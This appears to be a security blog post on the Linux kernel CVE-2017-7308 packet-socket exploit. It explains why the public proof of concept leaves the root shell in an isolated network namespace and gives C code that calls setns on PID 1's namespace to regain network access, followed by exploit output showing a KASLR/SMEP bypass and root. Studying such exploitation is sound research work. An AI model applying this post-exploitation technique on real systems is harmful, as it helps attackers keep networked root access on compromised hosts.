As part of my daily work as an Exploit Writer, I decided to take a look at CVE-2017-7308. It is a Linux Kernel vulnerability related to packet sockets. I will not go into details about the bug itself or its exploitation because there is an excellent write-up about it written by Andrey Konovalov in the P0 blog, instead I'm going to focus this post on a little issue I found after the exploitation of this bug.

As said previously, the bug is related to Linux packet sockets. Specifically, and quoting Andrey:

The bug itself (CVE-2017-7308) is a signedness issue, which leads to an exploitable heap-out-of-bounds write. It can be triggered by providing specific parameters to the PACKET_RX_RING option on an AF_PACKET socket with a TPACKET_V3 ring buffer version enabled.

The bug affects a kernel if it has AF_PACKET sockets enabled (CONFIG_PACKET=y), which is the case for many Linux kernel distributions but exploitation requires the CAP_NET_RAW capability to be able to create such sockets. In general, this is only available for privileged users. However, it's possible to do that from a user namespace if they are enabled (CONFIG_USER_NS=y) and accessible to unprivileged users.

Andrey provided a PoC in order to demonstrate the exploitation of this vulnerability. If you compile the code and run it, you get a nice shell:


Great, we got a shell, so far, so good. But here's the thing, I wanted to do some network related stuff after exploitation and found out that I was completely isolated from the real network interfaces. By listing the network interfaces, from the recently spawned shell, we get this:


As seen in the image, we only have the Loopback interface available and can't ping Google. At this point, the immediate questions are: why is this happening and how to solve it?

The first question is answered almost immediately after reading Andre's post, looking at the source and reading the Linux packet socket documentations.

In his code, he creates a new user namespace by calling the unshare function with the CLONE_NEWUSER flag [1]. This way, the calling process is moved into a new user namespace which is not shared with any previously existing process. As said previously, this is a necessary condition for exploitation. Only privileged users have access to the CAP_NET_RAW capability, but unprivileged users inside a new user namespace can create packet sockets, that's why he uses unshare(CLONE_NEWUSER).

Then, a second call to the unshare function is made but this time with the CLONE_NEWNET flag [2]. According to the docs, this flag "Unshare the network namespace, so that the calling process is moved into a new network namespace which is not shared with any previously existing process." Now things are beginning to clear. However, I clearly understood the use of CLONE_NEWUSER but why must the network be isolated? Again, Andrey's post has the answer. Basically, Andrey needed an isolated environment with no interference to send packets with an arbitrary content through the Loopback interface in order to control the out-of-bound overwrite in a reliable way. Doing this in an environment with lots of interfaces and lots of packet data coming and going would have lowered the reliability of the exploit.

Now that we understand the real problem, we must find a way to overcome this situation. The answer is setns. This function is one of the main three functions in the namespace API. According to the docs: "The setns(2) system call allows the calling process to join an existing namespace. The namespace to join is specified via a file descriptor that refers to one of the /proc/[pid]/ns files". There are a few namespaces we can join, however, the one we are interested in is /proc/[pid]/ns/net. This file is a handle for the network namespace of the process. The only thing left is to know which network namespace we must to join. To be more specific, we need to know the PID of the process whose network namespace we want to join.

I decided to join the network namespace from PID 1. This is the PID of the init process in Linux, this is the first process the kernel starts thus it has the biggest privileged processes so I guess it would have access to any network interface in the system. However, we must have some privileges to join this network namespace but that's not a problem for us because we can do it AFTER exploiting the bug and gaining root privileges :)

So, in order to join the network namespace of PID 1, we must obtain a file descriptor for it, we do it this way:

int fd;
fd = open("/proc/1/ns/net", O_RDONLY);

Once we have a file descriptor, we use it in the call to setns and, as a second parameter, we indicate the namespace to join in:

setns(fd, CLONE_NEWNET);

In order to test this, I slightly modified the exec_shell function from Andrey's PoC, which is triggered after escalating privileges, this way:

void exec_shell() {
        char *shell = "/bin/bash";
        char *args[] = {shell, "-i", NULL};

        int fd;

        fd = open("/proc/1/ns/net", O_RDONLY);
        if (fd == -1)
                perror("error opening /proc/1/ns/net");

        if (setns(fd, CLONE_NEWNET) == -1)
                perror("error calling setns");
        execve(shell, args, NULL);

After compiling and executing the exploit, here's the result:

fastix@fastix-virtual-machine:~$ gcc cve-2017-7308.c -o exploit
fastix@fastix-virtual-machine:~$ ./exploit 
[.] starting
[.] namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[.] done, kernel text:   ffffffffb5800000
[.] commit_creds:        ffffffffb58a5cf0
[.] prepare_kernel_cred: ffffffffb58a60e0
[.] native_write_cr4:    ffffffffb5864210
[.] padding heap
[.] done, heap is padded
[.] SMEP & SMAP bypass enabled, turning them off
[.] done, SMEP & SMAP should be off now
[.] executing get root payload 0x55fa39fa7612
[.] done, should be root now
[.] checking if we got root
[+] got r00t ^_^
root@fastix-virtual-machine:/home/fastix# id
uid=0(root) gid=0(root) groups=0(root)
root@fastix-virtual-machine:/home/fastix# ip link list
1: lo:  mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33:  mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
    link/ether 00:0c:29:98:3b:85 brd ff:ff:ff:ff:ff:ff,multicast,up,lower_up>
root@fastix-virtual-machine:/home/fastix# ifconfig 
ens33: flags=4163  mtu 1500
        inet  netmask  broadcast
        inet6 fe80::5cd:ee6f:92b:ccc6  prefixlen 64  scopeid 0x20
        ether 00:0c:29:98:3b:85  txqueuelen 1000  (Ethernet)
        RX packets 69  bytes 9044 (9.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 85  bytes 9782 (9.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0,broadcast,running,multicast>

lo: flags=73  mtu 65536
        inet  netmask
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 1  (Local Loopback)
        RX packets 3329  bytes 206245 (206.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3329  bytes 206245 (206.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@fastix-virtual-machine:/home/fastix# ping                                   
PING ( 56(84) bytes of data.
64 bytes from ( icmp_seq=1 ttl=50 time=52.7 ms
64 bytes from ( icmp_seq=2 ttl=50 time=54.6 ms
64 bytes from ( icmp_seq=3 ttl=50 time=51.9 ms
64 bytes from ( icmp_seq=4 ttl=50 time=53.7 ms
--- ping statistics ---
5 packets transmitted, 4 received, 20% packet loss, time 4008ms
rtt min/avg/max/mdev = 51.987/53.268/54.686/1.045 ms

As you can see, apart from the loopback interface, now we have the ens33 interface and can connect to the outside world.